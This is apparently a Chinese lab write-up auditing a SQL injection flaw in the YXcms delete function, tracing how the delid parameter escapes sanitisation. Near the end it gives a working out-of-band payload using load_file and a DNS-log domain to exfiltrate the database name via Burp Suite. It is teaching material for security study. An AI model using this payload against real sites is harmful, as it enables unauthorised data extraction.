一、漏洞描述
在处理删除内容时,传入的数据进行拼接赋值,整个数据传递过程仅对数组进行mysql_real_escape_string处理,导致SQL注入漏洞
在我的资源中下载::YXcms-含有SQL注入漏洞的源码包 下载
二、代码审计
在删除del()方法中,通过POST方式接受传递过来的delid参数,并将数组转化成字符串,之后直接带入到delete()方法中
implode() 函数:把数组元素组合为字符串:
跟踪delete方法,发现直接操作数据库语句,没有进行过滤,不过有一个条件$where = $this->_parseCondition(); //条件
跟踪_parseCondition()方法,发现通过options接收很多参数,并且有一个parseCondition()方法
跟踪option接受的参数,查看接收的内容,是通过数组的形式接收数据
跟踪parseCondition()方法,首先如果传递过来的内容不为空,就给condition赋值 WHERE ,如果是字符串的话,直接进行拼接,如果是数组的话,交由escape()方法处理
跟踪escape()方法,发现后面有个判断,如果是数组的话,返回给array_map()函数,如果开启魔术引号的话,返回给mysql_real_escape_string()函数,也就是传递数据的过程中,就只对数组进行了处理,对数字与字符串没有进行处理,这就是漏洞产生的关键
既然没有对数字进行处理,那么就进行漏洞攻击测试
因为攻击测试的过程中,没有任何回显,无法通过回显内容判断注入语句是否成功,因此采用DNSLOG
delid参数在下图中的位置
点击删除并使用burpsuite抓包,将值修改为:select load_file(concat('\\\\',(select database()),'.test.dnslog.link\\abc'))
此时去DNSLOG平台上查看,发现已经有数据库名yxcms了
注意:
环境搭建,my.ini要添加读写文件的功能,否则实验不成功
DNSLOG平台:http://admin.dnslog.link/
DNSLOG介绍:/post/id/98096
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。